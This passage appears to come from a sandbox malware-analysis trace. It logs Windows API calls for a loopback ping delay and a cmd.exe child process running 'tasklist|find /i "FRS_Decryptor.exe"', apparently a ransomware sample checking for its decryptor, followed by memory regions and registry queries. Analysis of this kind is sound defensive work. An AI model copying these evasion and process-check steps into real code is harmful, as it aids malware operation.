uBytes=0xa) returned 0xa18928 [0092.623] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xa18928, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0092.623] _fileno (_File=0x76ea4c28) returned 1 [0092.623] _write (in: _FileHandle=1, _Buf=0xa18928*, _MaxCharCount=0x9 | out: _Buf=0xa18928*) returned 9 [0092.623] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0092.623] _fileno (_File=0x76ea4c28) returned 1 [0092.623] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0092.623] LocalFree (hMem=0xa18928) returned 0x0 [0092.623] LocalFree (hMem=0xa27fa0) returned 0x0 [0092.623] Sleep (dwMilliseconds=0x3e8) [0093.636] IcmpSendEcho2Ex (in: IcmpHandle=0xa16a68, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xa1c368, RequestSize=0x20, RequestOptions=0x9cf1a4, ReplyBuffer=0xa25270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xa25270) returned 0x1 [0093.637] InetNtopW (in: Family=2, pAddr=0x9cf194, pStringBuf=0x9cf2bc, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0093.637] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x9cf128, nSize=0x0, Arguments=0x9cf124 | out: lpBuffer="羠¢﫸\x9c⛔\x94䰨盪✣") returned 0x16 [0093.637] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0093.637] _fileno (_File=0x76ea4c28) returned 1 [0093.637] _get_osfhandle (_FileHandle=1) returned 0x28 [0093.637] GetFileType (hFile=0x28) returned 0x2 [0093.637] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x9cf0ec | out: lpMode=0x9cf0ec) returned 0 [0093.637] GetLastError () returned 0x6 [0093.637] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x9cf050, nSize=0x50 | out: lpBuffer="\x9c✣") returned 0x0 [0093.637] _fileno (_File=0x76ea4c28) returned 1 [0093.637] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0093.637] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0093.637] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xa27fd8 [0093.637] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xa27fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0093.637] _fileno (_File=0x76ea4c28) returned 1 [0093.637] _write (in: _FileHandle=1, _Buf=0xa27fd8*, _MaxCharCount=0x16 | out: _Buf=0xa27fd8*) returned 22 [0093.637] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0093.637] _fileno (_File=0x76ea4c28) returned 1 [0093.637] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0093.637] LocalFree (hMem=0xa27fd8) returned 0x0 [0093.637] LocalFree (hMem=0xa27fa0) returned 0x0 [0093.637] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x9cf128, nSize=0x0, Arguments=0x9cf124 | out: lpBuffer="羠¢﫸\x9c⛿\x94䰨盪✼") returned 0x9 [0093.638] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0093.638] _fileno (_File=0x76ea4c28) returned 1 [0093.638] _get_osfhandle (_FileHandle=1) returned 0x28 [0093.638] GetFileType (hFile=0x28) returned 0x2 [0093.638] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x9cf0ec | out: lpMode=0x9cf0ec) returned 0 [0093.638] GetLastError () returned 0x6 [0093.638] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x9cf050, nSize=0x50 | out: lpBuffer="\x9c✼") returned 0x0 [0093.638] _fileno (_File=0x76ea4c28) returned 1 [0093.638] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0093.638] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.638] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa18ac0 [0093.638] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xa18ac0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0093.638] _fileno (_File=0x76ea4c28) returned 1 [0093.638] _write (in: _FileHandle=1, _Buf=0xa18ac0*, _MaxCharCount=0x9 | out: _Buf=0xa18ac0*) returned 9 [0093.638] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0093.638] _fileno (_File=0x76ea4c28) returned 1 [0093.638] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0093.638] LocalFree (hMem=0xa18ac0) returned 0x0 [0093.638] LocalFree (hMem=0xa27fa0) returned 0x0 [0093.638] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x9cf12c, nSize=0x0, Arguments=0x9cf128 | out: lpBuffer="羠¢﫸\x9c➷\x94䰨盪✧") returned 0x9 [0093.638] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0093.638] _fileno (_File=0x76ea4c28) returned 1 [0093.638] _get_osfhandle (_FileHandle=1) returned 0x28 [0093.638] GetFileType (hFile=0x28) returned 0x2 [0093.638] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x9cf0f0 | out: lpMode=0x9cf0f0) returned 0 [0093.638] GetLastError () returned 0x6 [0093.638] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x9cf054, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0093.638] _fileno (_File=0x76ea4c28) returned 1 [0093.638] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0093.638] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.638] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa18928 [0093.638] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xa18928, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0093.638] _fileno (_File=0x76ea4c28) returned 1 [0093.638] _write (in: _FileHandle=1, _Buf=0xa18928*, _MaxCharCount=0x9 | out: _Buf=0xa18928*) returned 9 [0093.638] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0093.638] _fileno (_File=0x76ea4c28) returned 1 [0093.638] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0093.638] LocalFree (hMem=0xa18928) returned 0x0 [0093.638] LocalFree (hMem=0xa27fa0) returned 0x0 [0093.638] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x9cf128, nSize=0x0, Arguments=0x9cf124 | out: lpBuffer="羠¢﫸\x9c⟘\x94䰨盪✨") returned 0x9 [0093.638] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0093.638] _fileno (_File=0x76ea4c28) returned 1 [0093.638] _get_osfhandle (_FileHandle=1) returned 0x28 [0093.638] GetFileType (hFile=0x28) returned 0x2 [0093.638] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x9cf0ec | out: lpMode=0x9cf0ec) returned 0 [0093.638] GetLastError () returned 0x6 [0093.638] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x9cf050, nSize=0x50 | out: lpBuffer="\x9c✨") returned 0x0 [0093.638] _fileno (_File=0x76ea4c28) returned 1 [0093.638] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0093.639] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.639] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa18ac0 [0093.639] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xa18ac0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0093.639] _fileno (_File=0x76ea4c28) returned 1 [0093.639] _write (in: _FileHandle=1, _Buf=0xa18ac0*, _MaxCharCount=0x9 | out: _Buf=0xa18ac0*) returned 9 [0093.639] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0093.639] _fileno (_File=0x76ea4c28) returned 1 [0093.639] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0093.639] LocalFree (hMem=0xa18ac0) returned 0x0 [0093.639] LocalFree (hMem=0xa27fa0) returned 0x0 [0093.639] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x9cf0b0, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0093.639] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x9cf084, nSize=0x0, Arguments=0x9cf080 | out: lpBuffer="羠¢\x9c᧰\x94䰨盪❏") returned 0x5c [0093.639] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0093.639] _fileno (_File=0x76ea4c28) returned 1 [0093.639] _get_osfhandle (_FileHandle=1) returned 0x28 [0093.639] GetFileType (hFile=0x28) returned 0x2 [0093.639] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x9cf048 | out: lpMode=0x9cf048) returned 0 [0093.639] GetLastError () returned 0x6 [0093.639] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x9cefac, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0093.639] _fileno (_File=0x76ea4c28) returned 1 [0093.639] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0093.639] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0093.639] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0xa28068 [0093.639] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0xa28068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0093.639] _fileno (_File=0x76ea4c28) returned 1 [0093.639] _write (in: _FileHandle=1, _Buf=0xa28068*, _MaxCharCount=0x5c | out: _Buf=0xa28068*) returned 92 [0093.639] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0093.639] _fileno (_File=0x76ea4c28) returned 1 [0093.639] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0093.639] LocalFree (hMem=0xa28068) returned 0x0 [0093.639] LocalFree (hMem=0xa27fa0) returned 0x0 [0093.639] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x9cf090, nSize=0x0, Arguments=0x9cf08c | out: lpBuffer="羠¢\x9cᨧ\x94䰨盪❓") returned 0x61 [0093.639] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0093.639] _fileno (_File=0x76ea4c28) returned 1 [0093.639] _get_osfhandle (_FileHandle=1) returned 0x28 [0093.639] GetFileType (hFile=0x28) returned 0x2 [0093.639] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x9cf054 | out: lpMode=0x9cf054) returned 0 [0093.639] GetLastError () returned 0x6 [0093.639] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x9cefb8, nSize=0x50 | out: lpBuffer="\x9c❓") returned 0x0 [0093.639] _fileno (_File=0x76ea4c28) returned 1 [0093.639] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0093.639] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0093.639] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0xa28070 [0093.639] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0xa28070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0093.639] _fileno (_File=0x76ea4c28) returned 1 [0093.639] _write (in: _FileHandle=1, _Buf=0xa28070*, _MaxCharCount=0x61 | out: _Buf=0xa28070*) returned 97 [0093.639] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0093.639] _fileno (_File=0x76ea4c28) returned 1 [0093.639] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0093.640] LocalFree (hMem=0xa28070) returned 0x0 [0093.640] LocalFree (hMem=0xa27fa0) returned 0x0 [0093.640] IcmpCloseHandle (IcmpHandle=0xa16a68) returned 1 [0093.640] LocalFree (hMem=0xa1c368) returned 0x0 [0093.640] LocalFree (hMem=0xa25270) returned 0x0 [0093.640] WSACleanup () returned 0 [0093.640] exit (_Code=0) Thread: id = 242 os_tid = 0xbb8 Thread: id = 243 os_tid = 0xba8 Process: id = "82" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x5dd7000" os_pid = "0x934" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4331 start_va = 0xd90000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 4332 start_va = 0xdb0000 end_va = 0xdb1fff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 4333 start_va = 0xdc0000 end_va = 0xdcefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dc0000" filename = "" Region: id = 4334 start_va = 0xdd0000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 4335 start_va = 0xe10000 end_va = 0xf0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 4336 start_va = 0xf10000 end_va = 0xf13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f10000" filename = "" Region: id = 4337 start_va = 0xf20000 end_va = 0xf20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f20000" filename = "" Region: id = 4338 start_va = 0xf30000 end_va = 0xf31fff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 4339 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 4340 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4341 start_va = 0x7f1b0000 end_va = 0x7f1d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f1b0000" filename = "" Region: id = 4342 start_va = 0x7f1d7000 end_va = 0x7f1d7fff entry_point = 0x0 region_type = private name = "private_0x000000007f1d7000" filename = "" Region: id = 4343 start_va = 0x7f1d8000 end_va = 0x7f1d8fff entry_point = 0x0 region_type = private name = "private_0x000000007f1d8000" filename = "" Region: id = 4344 start_va = 0x7f1dd000 end_va = 0x7f1dffff entry_point = 0x0 region_type = private name = "private_0x000000007f1dd000" filename = "" Region: id = 4345 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4346 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4347 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4348 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 4349 start_va = 0x10a0000 end_va = 0x10affff entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 4350 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4351 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4352 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4353 start_va = 0xd90000 end_va = 0xd9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d90000" filename = "" Region: id = 4354 start_va = 0xda0000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 4355 start_va = 0xf40000 end_va = 0xfbdfff entry_point = 0xf40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4356 start_va = 0x13e0000 end_va = 0x14dffff entry_point = 0x0 region_type = private name = "private_0x00000000013e0000" filename = "" Region: id = 4357 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4358 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4359 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4360 start_va = 0x7f0b0000 end_va = 0x7f1affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f0b0000" filename = "" Region: id = 4361 start_va = 0xdb0000 end_va = 0xdb3fff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 4362 start_va = 0x14e0000 end_va = 0x17b4fff entry_point = 0x14e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4381 start_va = 0xfc0000 end_va = 0xfc3fff entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Thread: id = 244 os_tid = 0x938 [0093.666] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0093.666] __set_app_type (_Type=0x1) [0093.666] __p__fmode () returned 0x76ea1768 [0093.666] __p__commode () returned 0x76ea176c [0093.666] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0093.666] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0093.666] GetCurrentThreadId () returned 0x938 [0093.666] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x938) returned 0x34 [0093.666] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0093.666] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0093.666] SetThreadUILanguage (LangId=0x0) returned 0x409 [0093.668] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0093.668] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xf0fee4 | out: phkResult=0xf0fee4*=0x0) returned 0x2 [0093.668] VirtualQuery (in: lpAddress=0xf0fef3, lpBuffer=0xf0fe8c, dwLength=0x1c | out: lpBuffer=0xf0fe8c*(BaseAddress=0xf0f000, AllocationBase=0xe10000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0093.668] VirtualQuery (in: lpAddress=0xe10000, lpBuffer=0xf0fe8c, dwLength=0x1c | out: lpBuffer=0xf0fe8c*(BaseAddress=0xe10000, AllocationBase=0xe10000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0093.668] VirtualQuery (in: lpAddress=0xe11000, lpBuffer=0xf0fe8c, dwLength=0x1c | out: lpBuffer=0xf0fe8c*(BaseAddress=0xe11000, AllocationBase=0xe10000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0093.668] VirtualQuery (in: lpAddress=0xe13000, lpBuffer=0xf0fe8c, dwLength=0x1c | out: lpBuffer=0xf0fe8c*(BaseAddress=0xe13000, AllocationBase=0xe10000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0093.668] VirtualQuery (in: lpAddress=0xf10000, lpBuffer=0xf0fe8c, dwLength=0x1c | out: lpBuffer=0xf0fe8c*(BaseAddress=0xf10000, AllocationBase=0xf10000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0093.668] GetConsoleOutputCP () returned 0x1b5 [0093.668] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0093.669] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0093.669] _get_osfhandle (_FileHandle=1) returned 0x34c [0093.669] SetConsoleMode (hConsoleHandle=0x34c, dwMode=0x0) returned 0 [0093.669] _get_osfhandle (_FileHandle=1) returned 0x34c [0093.669] GetConsoleMode (in: hConsoleHandle=0x34c, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0093.669] _get_osfhandle (_FileHandle=0) returned 0x24 [0093.669] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0093.669] GetEnvironmentStringsW () returned 0x13e40c0* [0093.669] FreeEnvironmentStringsA (penv="=") returned 1 [0093.669] GetEnvironmentStringsW () returned 0x13e40c0* [0093.669] FreeEnvironmentStringsA (penv="=") returned 1 [0093.669] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xf0ee34 | out: phkResult=0xf0ee34*=0x44) returned 0x0 [0093.669] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xf0ee3c, lpData=0xf0ee40, lpcbData=0xf0ee38*=0x1000 | out: lpType=0xf0ee3c*=0x0, lpData=0xf0ee40*=0x0, lpcbData=0xf0ee38*=0x1000) returned 0x2 [0093.669] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xf0ee3c, lpData=0xf0ee40, lpcbData=0xf0ee38*=0x1000 | out: lpType=0xf0ee3c*=0x4, lpData=0xf0ee40*=0x1, lpcbData=0xf0ee38*=0x4) returned 0x0 [0093.669] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xf0ee3c, lpData=0xf0ee40, lpcbData=0xf0ee38*=0x1000 | out: lpType=0xf0ee3c*=0x0, lpData=0xf0ee40*=0x1, lpcbData=0xf0ee38*=0x1000) returned 0x2 [0093.669] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xf0ee3c, lpData=0xf0ee40, lpcbData=0xf0ee38*=0x1000 | out: lpType=0xf0ee3c*=0x4, lpData=0xf0ee40*=0x0, lpcbData=0xf0ee38*=0x4) returned 0x0 [0093.669] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xf0ee3c, lpData=0xf0ee40, lpcbData=0xf0ee38*=0x1000 | out: lpType=0xf0ee3c*=0x4, lpData=0xf0ee40*=0x40, lpcbData=0xf0ee38*=0x4) returned 0x0 [0093.669] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xf0ee3c, lpData=0xf0ee40, lpcbData=0xf0ee38*=0x1000 | out: lpType=0xf0ee3c*=0x4, lpData=0xf0ee40*=0x40, lpcbData=0xf0ee38*=0x4) returned 0x0 [0093.669] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xf0ee3c, lpData=0xf0ee40, lpcbData=0xf0ee38*=0x1000 | out: lpType=0xf0ee3c*=0x0, lpData=0xf0ee40*=0x40, lpcbData=0xf0ee38*=0x1000) returned 0x2 [0093.669] RegCloseKey (hKey=0x44) returned 0x0 [0093.669] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xf0ee34 | out: phkResult=0xf0ee34*=0x44) returned 0x0 [0093.669] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xf0ee3c, lpData=0xf0ee40, lpcbData=0xf0ee38*=0x1000 | out: lpType=0xf0ee3c*=0x0, lpData=0xf0ee40*=0x40, 